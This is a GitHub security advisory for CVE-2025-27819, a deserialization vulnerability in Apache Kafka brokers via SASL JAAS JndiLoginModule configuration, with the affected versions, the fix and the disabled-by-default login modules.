GHSA-mcwh-c9pg-xw43: Apache Kafka Deserialization of Untrusted Data vulnerability

1. GitHub Advisory Database
2. GitHub Reviewed
3. CVE-2025-27819

Apache Kafka Deserialization of Untrusted Data vulnerability

High severity GitHub Reviewed Published Jun 10, 2025 to the GitHub Advisory Database • Updated Jun 10, 2025

Package

maven org.apache.kafka:kafka (Maven)

Affected versions

< 3.4.0

In CVE-2023-25194, we announced the RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration in Kafka Connect API. But not only Kafka Connect API is vulnerable to this attack, the Apache Kafka brokers also have this vulnerability. To exploit this vulnerability, the attacker needs to be able to connect to the Kafka cluster and have the AlterConfigs permission on the cluster resource.

Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default “com.sun.security.auth.module.JndiLoginModule” is disabled in Apache Kafka 3.4.0, and “com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule” is disabled by default in in Apache Kafka 3.9.1/4.0.0

References

• https://nvd.nist.gov/vuln/detail/CVE-2025-27819
• https://kafka.apache.org/cve-list
• GHSA-26f8-x7cc-wqpc

Published to the GitHub Advisory Database

Jun 10, 2025

Last updated

Jun 10, 2025